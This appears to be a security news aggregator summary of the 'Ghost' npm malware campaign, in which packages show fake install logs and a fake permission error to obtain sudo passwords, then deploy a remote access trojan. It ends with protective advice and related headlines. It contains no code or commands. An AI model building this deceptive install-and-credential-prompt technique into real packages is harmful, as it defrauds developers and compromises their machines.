CP
cyberpings
Malware & RansomwareHIGH

Malware - Fake npm Install Messages Spread RAT in Campaign

CSCyber Security News
npmRATGhost campaignmalwareReversingLabs
🎯

Basically, fake installation messages trick developers into installing malware on their computers.

Quick Summary

A new malware campaign is deceiving developers through fake npm install messages. This clever tactic hides a RAT that steals sensitive data. Developers must be vigilant to protect their systems from this threat.

What Happened

A new and sophisticated software supply chain campaign is targeting developers via the npm package registry. Dubbed the Ghost campaign, it began in early February 2026. The campaign employs a set of deceptive npm packages designed to mislead developers into surrendering their system credentials while secretly deploying a remote access trojan (RAT) on their machines.

When a developer installs one of these malicious packages, it generates what appears to be a normal npm installation. The package displays log messages, shows a progress bar, and inserts random delays to create a realistic experience. However, none of the packages it claims to download actually exist, making it difficult for even experienced developers to detect the malicious activity.

Who's Being Targeted

The campaign primarily targets developers who frequently use the npm package registry. The seven identified packages include names like react-performance-suite, react-state-optimizer-core, and coinbase-desktop-sdk, all published by a user named “mikilanjillo.” This deceptive tactic is particularly concerning as it represents a shift in how threat actors operate within open-source ecosystems, making it harder to spot malicious intent.

In March 2026, further analysis revealed a related cluster, dubbed GhostClaw, which shares similar techniques and infrastructure. This indicates that the campaign may be broader than initially thought, potentially affecting a larger number of developers and projects.

Signs of Infection

One of the most deceptive elements of this campaign is how it tricks developers into providing their sudo password. The installation process generates an error about missing write permissions, prompting the developer to enter their root password. This request feels entirely expected, as permission errors during npm installs are common.

Once the password is entered, the malware's downloader runs silently while the fake logs continue to scroll, masking the malicious activity. The downloader then contacts a Telegram channel to fetch the final payload URL and its decryption key. This allows the RAT to be executed, granting attackers persistent access to the compromised system.

How to Protect Yourself

Developers should exercise caution when installing npm packages. Here are some key protective measures:

  • Never enter your sudo or root password when prompted by an npm package during installation.
  • Verify the package authors and repository history before installation.
  • Utilize automated security scanning tools to identify suspicious scripts.
  • Enforce strict dependency review workflows within organizations.

By treating any password prompts during software installations as major warning signs, developers can significantly reduce their risk of falling victim to such sophisticated attacks.

🔒 Pro insight: The Ghost campaign exemplifies evolving tactics in supply chain attacks, emphasizing the need for robust dependency management and user education.

Original article from

Cyber Security News · Tushar Subhra Dutta

Read Full Article

Share

Related Pings

HIGHMalware & Ransomware

WebRTC Skimmer - Bypasses CSP to Steal Payment Data

A new WebRTC skimmer is stealing payment data from e-commerce sites by bypassing security controls. This malware exploits vulnerabilities in Magento, affecting many online stores. Site owners must act quickly to protect their customers and secure their platforms.

The Hacker News·
HIGHMalware & Ransomware

Malware - Fake VS Code Alerts Fuel Phishing Campaign on GitHub

A phishing campaign on GitHub is tricking developers with fake VS Code alerts. These alerts lead to malware downloads, posing serious risks. Always verify updates through official channels to stay safe.

Cyber Security News·
HIGHMalware & Ransomware

Malware Hits LiteLLM - Credential Harvesting Incident Revealed

LiteLLM, a popular AI project, was hit by malware that harvested user credentials. Millions of users are affected, raising serious security concerns. The developers are working to resolve the issue and prevent future attacks.

TechCrunch Security·
HIGHMalware & Ransomware

RedLine Infostealer - Alleged Conspirator Extradited to US

An Armenian man has been extradited to the US for his role in the RedLine infostealer malware. This notorious software has stolen billions of credentials, affecting countless users. His extradition is a significant move in the fight against cybercrime, emphasizing the need for vigilance.

CyberScoop·
HIGHMalware & Ransomware

Malware - Russian National Convicted for Botnet Attacks

A Russian hacker was sentenced for running a botnet that attacked U.S. firms. His actions resulted in over $14 million in extortion payments. This case highlights the serious risks of cybercrime.

Security Affairs·
HIGHMalware & Ransomware

Ransomware - US Healthcare Provider Hit by Iranian Gang

A U.S. healthcare provider has been targeted by the Iranian ransomware gang Pay2Key. This attack underscores the growing risk to critical infrastructure. Organizations must enhance their cybersecurity measures to combat such threats.

SC Media·